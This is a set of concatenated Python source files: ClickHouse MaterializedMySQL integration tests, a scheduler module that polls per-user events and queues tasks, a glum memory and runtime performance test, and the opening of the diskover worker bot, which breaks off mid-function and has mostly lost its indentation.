clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
mysql_node.query("CREATE DATABASE materialize_with_column_comments_test")
mysql_node.query("CREATE TABLE materialize_with_column_comments_test.test (id int NOT NULL PRIMARY KEY, value VARCHAR(255) COMMENT 'test comment') ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE materialize_with_column_comments_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_column_comments_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\ttest comment\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test MODIFY value VARCHAR(255) COMMENT 'comment test'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test ADD value2 int COMMENT 'test comment 2'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\nvalue2\tNullable(Int32)\t\t\ttest comment 2\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_column_comments_test")
mysql_node.query("DROP DATABASE materialize_with_column_comments_test")
def materialize_with_enum8_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
mysql_node.query("CREATE DATABASE materialize_with_enum8_test")
enum8_values_count = 127
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum8_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum8_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum8_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (3, '127')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n127\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum8_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum8_test")
mysql_node.query("DROP DATABASE materialize_with_enum8_test")
def materialize_with_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
mysql_node.query("CREATE DATABASE materialize_with_enum16_test")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum16_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum16_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (3, '500')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n500\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum16_test")
mysql_node.query("DROP DATABASE materialize_with_enum16_test")
def alter_enum8_to_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
mysql_node.query("CREATE DATABASE alter_enum8_to_enum16_test")
enum8_values_count = 100
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE alter_enum8_to_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE alter_enum8_to_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'alter_enum8_to_enum16_test', 'root', 'clickhouse')".format(service_name))
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (3, '75')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("ALTER TABLE alter_enum8_to_enum16_test.test MODIFY COLUMN value ENUM(" + enum16_values + ")")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (4, '500')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n500\n")
clickhouse_node.query("DROP DATABASE alter_enum8_to_enum16_test")
mysql_node.query("DROP DATABASE alter_enum8_to_enum16_test")
def move_to_prewhere_and_column_filtering(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("CREATE DATABASE cond_on_key_col")
clickhouse_node.query("CREATE DATABASE cond_on_key_col ENGINE = MaterializedMySQL('{}:3306', 'cond_on_key_col', 'root', 'clickhouse')".format(service_name))
mysql_node.query("create table cond_on_key_col.products (id int primary key, product_id int not null, catalog_id int not null, brand_id int not null, name text)")
mysql_node.query("insert into cond_on_key_col.products (id, name, catalog_id, brand_id, product_id) values (915, 'ertyui', 5287, 15837, 0), (990, 'wer', 1053, 24390, 1), (781, 'qwerty', 1041, 1176, 2);")
mysql_node.query("create table cond_on_key_col.test (id int(11) NOT NULL AUTO_INCREMENT, a int(11) DEFAULT NULL, b int(11) DEFAULT NULL, PRIMARY KEY (id)) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;")
mysql_node.query("insert into cond_on_key_col.test values (42, 123, 1);")
mysql_node.query("CREATE TABLE cond_on_key_col.balance_change_record (id bigint(20) NOT NULL AUTO_INCREMENT, type tinyint(4) DEFAULT NULL, value decimal(10,4) DEFAULT NULL, time timestamp NULL DEFAULT NULL, "
"initiative_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, passivity_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"person_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, tenant_code varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"created_time timestamp NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', updated_time timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, "
"value_snapshot decimal(10,4) DEFAULT NULL, PRIMARY KEY (id), KEY balance_change_record_initiative_id (person_id) USING BTREE, "
"KEY type (type) USING BTREE, KEY balance_change_record_type (time) USING BTREE, KEY initiative_id (initiative_id) USING BTREE, "
"KEY balance_change_record_tenant_code (passivity_id) USING BTREE, KEY tenant_code (tenant_code) USING BTREE) ENGINE=InnoDB AUTO_INCREMENT=1691049 DEFAULT CHARSET=utf8")
mysql_node.query("insert into cond_on_key_col.balance_change_record values (123, 1, 3.14, null, 'qwe', 'asd', 'zxc', 'rty', null, null, 2.7);")
mysql_node.query("CREATE TABLE cond_on_key_col.test1 (id int(11) NOT NULL AUTO_INCREMENT, c1 varchar(32) NOT NULL, c2 varchar(32), PRIMARY KEY (id)) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4")
mysql_node.query("insert into cond_on_key_col.test1(c1,c2) values ('a','b'), ('c', null);")
check_query(clickhouse_node, "SELECT DISTINCT P.id, P.name, P.catalog_id FROM cond_on_key_col.products P WHERE P.name ILIKE '%e%' and P.catalog_id=5287", '915\tertyui\t5287\n')
check_query(clickhouse_node, "select count(a) from cond_on_key_col.test where b = 1;", "1\n")
check_query(clickhouse_node, "select id from cond_on_key_col.balance_change_record where type=1;", "123\n")
check_query(clickhouse_node, "select count(c1) from cond_on_key_col.test1 where c2='b';", "1\n")
clickhouse_node.query("DROP DATABASE cond_on_key_col")
mysql_node.query("DROP DATABASE cond_on_key_col")
def mysql_settings_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database")
mysql_node.query("CREATE TABLE test_database.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("INSERT INTO test_database.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO test_database.a VALUES(2, 'bar')")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM test_database.a FORMAT TSV", "2\n")
assert clickhouse_node.query("SELECT COUNT(DISTINCT blockNumber()) FROM test_database.a FORMAT TSV") == "2\n"
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_large_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS largetransaction")
clickhouse_node.query("DROP DATABASE IF EXISTS largetransaction")
mysql_node.query("CREATE DATABASE largetransaction")
mysql_node.query("CREATE TABLE largetransaction.test_table ("
"`key` INT NOT NULL PRIMARY KEY AUTO_INCREMENT, "
"`value` INT NOT NULL) ENGINE = InnoDB;")
num_rows = 200000
rows_per_insert = 5000
values = ",".join(["(1)" for _ in range(rows_per_insert)])
for i in range(num_rows//rows_per_insert):
mysql_node.query(f"INSERT INTO largetransaction.test_table (`value`) VALUES {values};")
clickhouse_node.query("CREATE DATABASE largetransaction ENGINE = MaterializedMySQL('{}:3306', 'largetransaction', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table", f"{num_rows}\n")
mysql_node.query("UPDATE largetransaction.test_table SET value = 2;")
# Attempt to restart clickhouse after it has started processing
# the transaction, but before it has completed it.
while int(clickhouse_node.query("SELECT COUNT() FROM largetransaction.test_table WHERE value = 2")) == 0:
time.sleep(0.2)
clickhouse_node.restart_clickhouse()
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table WHERE value = 2", f"{num_rows}\n")
clickhouse_node.query("DROP DATABASE largetransaction")
mysql_node.query("DROP DATABASE largetransaction")
def table_table(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS table_test")
clickhouse_node.query("DROP DATABASE IF EXISTS table_test")
mysql_node.query("CREATE DATABASE table_test")
    # Test that the table name 'table' works as expected
mysql_node.query("CREATE TABLE table_test.table (id INT UNSIGNED PRIMARY KEY)")
mysql_node.query("INSERT INTO table_test.table VALUES (0),(1),(2),(3),(4)")
clickhouse_node.query("CREATE DATABASE table_test ENGINE=MaterializeMySQL('{}:3306', 'table_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT(*) FROM table_test.table", "5\n")
mysql_node.query("DROP DATABASE table_test")
clickhouse_node.query("DROP DATABASE table_test")
def table_overrides(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS table_overrides")
clickhouse_node.query("DROP DATABASE IF EXISTS table_overrides")
mysql_node.query("CREATE DATABASE table_overrides")
mysql_node.query("CREATE TABLE table_overrides.t1 (sensor_id INT UNSIGNED, timestamp DATETIME, temperature FLOAT, PRIMARY KEY(timestamp, sensor_id))")
for id in range(10):
mysql_node.query("BEGIN")
for day in range(100):
mysql_node.query(f"INSERT INTO table_overrides.t1 VALUES({id}, TIMESTAMP('2021-01-01') + INTERVAL {day} DAY, (RAND()*20)+20)")
mysql_node.query("COMMIT")
clickhouse_node.query(f"""
CREATE DATABASE table_overrides ENGINE=MaterializeMySQL('{service_name}:3306', 'table_overrides', 'root', 'clickhouse')
TABLE OVERRIDE t1 (COLUMNS (sensor_id UInt64))
""")
check_query(clickhouse_node, "SELECT count() FROM table_overrides.t1", "1000\n")
check_query(clickhouse_node, "SELECT type FROM system.columns WHERE database = 'table_overrides' AND table = 't1' AND name = 'sensor_id'", "UInt64\n")
clickhouse_node.query("DROP DATABASE IF EXISTS table_overrides")
mysql_node.query("DROP DATABASE IF EXISTS table_overrides")
|
events_process.py
|
from . import user
from . import db
import multiprocessing as mp
import threading as thr
import time
def init(instance_path):
queue = mp.Queue()
p = mp.Process(target=checkEvents, args=(instance_path, queue,))
p.daemon = True
p.start()
t = thr.Thread(target=checkQueue, args=(queue,))
t.daemon = True
t.start()
def checkQueue(queue : mp.Queue):
while(True):
dbo = None
try:
(uId, newTask) = queue.get()
usr = user.getById(uId)
dbo = db.createDb(usr.name)
from . import task
task.start(dbo, uId, newTask)
from . import pipeline_task as pt
pt.setChange(dbo, newTask.pplTaskId, True)
except Exception as err:
print("startNewTask failed: {0}".format(str(err)))
finally:
if dbo:
db.closeDb(dbo)
def checkEvents(instance_path : str, queue : mp.Queue):
startTime = time.time()
while(True):
deltaTimeSec = time.time() - startTime
startTime = time.time()
currTimeStr = time.strftime('%H:%M', time.localtime())
currDateTimeStr = time.strftime('%Y-%m-%d %H:%M', time.localtime())
for usr in user.allWithPath(instance_path):
dbo = None
try:
dbo = db.createDbWithPath(instance_path, usr.name)
if (dbo is None):
continue
from . import event
evts = event.allWithDB(dbo)
for evt in evts:
if (not evt.isEnabled):
continue
if evt.timeStartEverySec > 0:
evt.timeLastStartEverySec += deltaTimeSec
if evt.timeLastStartEverySec > evt.timeStartEverySec:
startTask(evt, dbo, usr, queue)
evt.timeLastStartEverySec = 0.0
for stTime in evt.timeStartOnceOfDay:
if (currTimeStr == stTime) and (evt.timeLastStartOnceOfDay != currTimeStr):
startTask(evt, dbo, usr, queue)
evt.timeLastStartOnceOfDay = currTimeStr
elif (currDateTimeStr == stTime) and (evt.timeLastStartOnceOfDay != currDateTimeStr):
startTask(evt, dbo, usr, queue)
evt.timeLastStartOnceOfDay = currDateTimeStr
event.updateLastStartTime(dbo, evt)
except Exception as err:
print("checkEvents failed: {0}".format(str(err)))
finally:
if dbo:
db.closeDb(dbo)
deltaTimeSec = time.time() - startTime
maxElapseTimeSec = 1.0
if (maxElapseTimeSec - deltaTimeSec) > 0.0:
time.sleep(maxElapseTimeSec - deltaTimeSec)
def startTask(evt, dbo, usr, queue):
for tId in evt.tasksForStart:
from . import pipeline_task as pt
pplTask = pt.get(dbo, tId)
if pplTask.isEnabled:
from . import task
newTask = task.Task(tId, starterEventId=evt.id, ttlId=pplTask.ttId)
newTask.params = pplTask.params
queue.put((usr.id, newTask,))
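# Usage sketch (not part of the original module, shown only for illustration):
# a host application would typically call init() once at startup, after which
# checkEvents() polls every user's database roughly once per second in a child
# process and checkQueue() starts any due tasks in the parent process. The
# package name "app" and the instance path below are assumptions; the relative
# imports above mean this module must be imported as part of its package
# rather than run directly.
#
#     from app import events_process   # hypothetical package layout
#     events_process.init("/var/lib/app/instance")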
|
test_performance.py
|
import gc
import multiprocessing as mp
import time
import warnings
from threading import Thread
from typing import List, Optional
import numpy as np
import pandas as pd
import psutil
import scipy.sparse as sps
import tabmat as tm
from glum import GeneralizedLinearRegressor
from glum_benchmarks.cli_run import get_all_problems
from glum_benchmarks.util import get_sklearn_family, runtime
def _get_memory_usage() -> int:
return psutil.Process().memory_info().rss
class MemoryPoller:
"""
Sample memory and compute useful statistics.
Example usage:
with MemoryPoller() as mp:
do some stuff here
print('initial memory usage', mp.initial_memory)
print('max memory usage', mp.max_memory)
excess_memory_used = mp.max_memory - mp.initial_memory
"""
def _poll_max_memory_usage(self):
while not self.stop_polling:
self.memory_usage.append(_get_memory_usage())
self.max_memory: int = max(self.max_memory, self.memory_usage[-1])
time.sleep(1e-4)
def __enter__(self):
"""See example usage above."""
self.stop_polling = False
self.max_memory = 0
self.initial_memory = _get_memory_usage()
self.memory_usage: List[int] = [self.initial_memory]
self.t = Thread(target=self._poll_max_memory_usage)
self.t.start()
return self
def __exit__(self, *excargs):
"""Stop polling memory usage."""
self.stop_polling = True
self.t.join()
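# Minimal usage sketch for MemoryPoller (not used by the benchmarks below;
# the array size is an arbitrary assumption chosen to make the peak visible).
def _memory_poller_example():
    with MemoryPoller() as poller:
        scratch = np.ones(10**8)  # roughly 800 MB of float64
        scratch += 1.0
    excess = poller.max_memory - poller.initial_memory
    print(f"peak excess RSS: {excess / 1e6:.1f} MB")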
def _get_x_bytes(x) -> int:
if isinstance(x, np.ndarray):
return x.nbytes
if sps.issparse(x):
return sum(
mat.data.nbytes + mat.indices.nbytes + mat.indptr.nbytes
for mat in [x, x.x_csr]
)
if isinstance(x, tm.CategoricalMatrix):
return x.indices.nbytes
if isinstance(x, tm.SplitMatrix):
return sum(_get_x_bytes(elt) for elt in x.matrices)
raise NotImplementedError(f"Can't get bytes for matrix of type {type(x)}.")
def _runner(storage, copy_X: Optional[bool]):
gc.collect()
P = get_all_problems()["wide-insurance-no-weights-lasso-poisson"]
dat = P.data_loader(num_rows=100000, storage=storage)
# Measure how much memory we are using before calling the GLM code
if isinstance(dat["X"], pd.DataFrame):
X = dat["X"].to_numpy()
elif sps.issparse(dat["X"]):
X = tm.SparseMatrix(dat["X"])
elif isinstance(dat["X"], tm.SplitMatrix):
X = dat["X"]
data_memory = _get_x_bytes(X)
y = dat["y"]
del dat
gc.collect()
with MemoryPoller() as mp:
for _ in range(4):
model = GeneralizedLinearRegressor(
family="poisson",
l1_ratio=1.0,
alpha=0.01,
force_all_finite=False,
copy_X=copy_X,
)
model.fit(X=X, y=y)
excess_memory_used = mp.max_memory - mp.initial_memory
extra_to_initial_ratio = excess_memory_used / data_memory
import matplotlib.pyplot as plt
graph = (np.array(mp.memory_usage) - mp.initial_memory) / data_memory
plt.plot(graph)
plt.ylabel("Memory (fraction of X)")
plt.xlabel("Time (1e-4s)")
plt.savefig(f"performance/memory_{storage}_copy_{copy_X}.png")
return extra_to_initial_ratio
def _make_memory_usage_plots():
    # These values are around double the empirical extra memory used.
    # They increase from dense->sparse->split->cat, because the matrix itself takes less
    # and less memory to store, so all the temporary vectors of length n_rows start to
    # dominate the memory usage.
storage_allowed_ratio = {"dense": 0.1, "sparse": 0.45, "cat": 1.3, "split0.1": 0.55}
for storage, allowed_ratio in storage_allowed_ratio.items():
for copy_X in [False, True, None]:
with mp.Pool(1) as p:
extra_to_initial_ratio = p.starmap(_runner, [(storage, copy_X)])[0]
if copy_X is not None and copy_X:
if extra_to_initial_ratio < 1:
warnings.warn(
f"Used less memory than expected with copy_X = True and "
f"data format {storage}. Memory exceeded initial memory by "
f"{extra_to_initial_ratio}."
)
else:
if extra_to_initial_ratio > allowed_ratio:
warnings.warn(
f"Used more memory than expected with copy_X = {copy_X} and "
f"data format {storage}. Memory exceeded initial memory by "
f"{extra_to_initial_ratio}; expected less than {allowed_ratio}."
)
def get_spmv_runtime():
"""
Get runtime of sparse matrix-vector product.
Sparse matrix-vector product runtime should be representative of the memory
    bandwidth of the machine. The result is scaled down by half the number of
    cores, since the scipy.sparse implementation is not parallelized whereas
    glum is parallelized.
"""
N = 20000000
diag_data = np.random.rand(5, N)
mat = sps.spdiags(diag_data, [0, 1, -1, 2, -2], N, N).tocsr()
v = np.random.rand(N)
return runtime(lambda: mat.dot(v), 5)[0] / (mp.cpu_count() // 2)
def get_dense_inv_runtime():
"""
Get runtime of dense matrix inverse.
    Dense matrix inversion runtime should be representative of the
floating point performance of the machine.
"""
N = 1300
X = np.random.rand(N, N)
return runtime(lambda: np.linalg.inv(X), 5)[0]
def runtime_checker():
"""
Run various operations and check that glum doesn't run too much
slower than operations expected to be similar. This isn't a perfect test
but it'll raise a red flag if the code has unexpectedly gotten much slower.
"""
spmv_runtime = get_spmv_runtime()
dense_inv_runtime = get_dense_inv_runtime()
what_to_check = [
("dense", "narrow-insurance-no-weights-lasso", "poisson", 200000, 1.5),
("sparse", "narrow-insurance-weights-l2", "gaussian", 200000, 2.5),
("cat", "wide-insurance-no-weights-l2", "gamma", 100000, 2.5),
("split0.1", "wide-insurance-offset-lasso", "tweedie-p=1.5", 100000, 3.0),
("split0.1", "intermediate-insurance-no-weights-net", "binomial", 200000, 1.0),
]
for storage, problem, distribution, num_rows, limit in what_to_check:
P = get_all_problems()[problem + "-" + distribution]
dat = P.data_loader(num_rows=num_rows, storage=storage)
family = get_sklearn_family(distribution)
model = GeneralizedLinearRegressor(
family=family,
l1_ratio=1.0,
alpha=0.01,
copy_X=False,
force_all_finite=False,
)
min_runtime, result = runtime(lambda: model.fit(X=dat["X"], y=dat["y"]), 5)
# Let's just guess that we're about half flop-limited and half
# memory-limited. This is a decent guess because the sandwich product is
# mostly flop-limited in the dense case and the dense case generally
# dominates even when we're using split or categorical. On the other hand,
# everything besides the sandwich product is probably memory limited.
denominator = 0.5 * dense_inv_runtime + 0.5 * spmv_runtime
if min_runtime / denominator > limit:
warnings.warn(
f"runtime {min_runtime} is greater than the expected maximum runtime "
f"of {limit * denominator}"
)
if __name__ == "__main__":
    # _make_memory_usage_plots()
runtime_checker()
|
diskover_worker_bot.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that indexes
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2018
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
import diskover
from redis import Redis
from rq import Worker, Connection
from datetime import datetime
import argparse
import os
import hashlib
import socket
import pwd
import grp
import time
import logging
import re
import base64
try:
from Queue import Queue as pyQueue
except ImportError:
from queue import Queue as pyQueue
from threading import Thread
# cache uid/gid names
uids = []
gids = []
owners = {}
groups = {}
# create Elasticsearch connection
es = diskover.elasticsearch_connect(diskover.config)
# create Redis connection
redis_conn = Redis(host=diskover.config['redis_host'], port=diskover.config['redis_port'],
password=diskover.config['redis_password'])
def parse_cli_args():
"""This is the parse CLI arguments function.
It parses command line arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--burst", action="store_true",
help="Burst mode (worker will quit after all work is done)")
parser.add_argument("-q", "--queue", metavar="QUEUE", nargs="+", default=None,
help="Queue worker bot should listen on \
(queues: diskover, diskover_crawl, diskover_calcdir) (default all)")
args = parser.parse_args()
return args
def bot_log_setup():
bot_logger = logging.getLogger('diskover_worker_bot')
bot_logger.setLevel(logging.INFO)
rq_logger = logging.getLogger('rq.worker')
rq_logger.setLevel(logging.INFO)
es_logger = logging.getLogger('elasticsearch')
es_logger.setLevel(logging.WARNING)
if diskover.config['botlogs'] == "True" or \
diskover.config['botlogs'] == "true":
botlogfile = 'diskover_bot_worker_' + get_worker_name() \
+ '_' + str(int(time.time())) + '_log'
fh = logging.FileHandler(os.path.join(diskover.config['botlogfiledir'], botlogfile))
fh.setLevel(logging.INFO)
bot_logger.addHandler(fh)
logging.addLevelName(
logging.INFO, "\033[1;32m%s\033[1;0m"
% logging.getLevelName(logging.INFO))
logging.addLevelName(
logging.WARNING, "\033[1;31m%s\033[1;0m"
% logging.getLevelName(logging.WARNING))
logging.addLevelName(
logging.ERROR, "\033[1;41m%s\033[1;0m"
% logging.getLevelName(logging.ERROR))
logging.addLevelName(
logging.DEBUG, "\033[1;33m%s\033[1;0m"
% logging.getLevelName(logging.DEBUG))
logformatter = '%(asctime)s [%(levelname)s][%(name)s] %(message)s'
loglevel = logging.INFO
logging.basicConfig(format=logformatter, level=loglevel)
return bot_logger
def get_worker_name():
"""This is the get worker name function.
    It returns the worker name in the form hostname.pid.
"""
return '{0}.{1}'.format(socket.gethostname().partition('.')[0], os.getppid())
def auto_tag(metadict, type, mtime, atime, ctime):
"""This is the auto tag function.
It checks diskover config for any auto tag patterns
and updates the meta dict for file or directory
to include the new tags.
"""
extpass = True
namepass = True
pathpass = True
timepass = True
if type == 'file':
for pattern in diskover.config['autotag_files']:
try:
for name in pattern['name_exclude']:
if name.startswith('*') and name.endswith('*'):
name = name.replace('*', '')
if re.search(name, metadict['filename']):
return metadict
elif name.startswith('*'):
name = name + '$'
if re.search(name, metadict['filename']):
return metadict
elif name.endswith('*'):
name = '^' + name
if re.search(name, metadict['filename']):
return metadict
else:
if name == metadict['filename']:
return metadict
except KeyError:
pass
try:
for path in pattern['path_exclude']:
if path.startswith('*') and path.endswith('*'):
path = path.replace('*', '')
if re.search(path, metadict['path_parent']):
return metadict
elif path.startswith('*'):
path = path + '$'
if re.search(path, metadict['path_parent']):
return metadict
elif path.endswith('*'):
path = '^' + path
if re.search(path, metadict['path_parent']):
return metadict
else:
if path == metadict['path_parent']:
return metadict
except KeyError:
pass
try:
for ext in pattern['ext']:
if ext.startswith('*') and ext.endswith('*'):
ext = ext.replace('*', '')
if re.search(ext, metadict['extension']):
extpass = True
break
else:
extpass = False
elif ext.startswith('*'):
ext = ext + '$'
if re.search(ext, metadict['extension']):
extpass = True
break
else:
extpass = False
elif ext.endswith('*'):
ext = '^' + ext
if re.search(ext, metadict['extension']):
extpass = True
break
else:
extpass = False
else:
if ext == metadict['extension']:
extpass = True
break
else:
extpass = False
except KeyError:
pass
try:
for name in pattern['name']:
if name.startswith('*') and name.endswith('*'):
name = name.replace('*', '')
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
elif name.startswith('*'):
name = name + '$'
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
elif name.endswith('*'):
name = '^' + name
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
else:
if name == metadict['filename']:
namepass = True
break
else:
namepass = False
except KeyError:
pass
try:
for path in pattern['path']:
if path.startswith('*') and path.endswith('*'):
path = path.replace('*', '')
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
elif path.startswith('*'):
path = path + '$'
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
elif path.endswith('*'):
path = '^' + path
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
else:
if path == metadict['path_parent']:
pathpass = True
break
else:
pathpass = False
except KeyError:
pass
timepass = auto_tag_time_check(pattern, mtime, atime, ctime)
if extpass and namepass and pathpass and timepass:
metadict['tag'] = pattern['tag']
metadict['tag_custom'] = pattern['tag_custom']
return metadict
elif type == 'directory':
for pattern in diskover.config['autotag_dirs']:
try:
for name in pattern['name_exclude']:
if name.startswith('*') and name.endswith('*'):
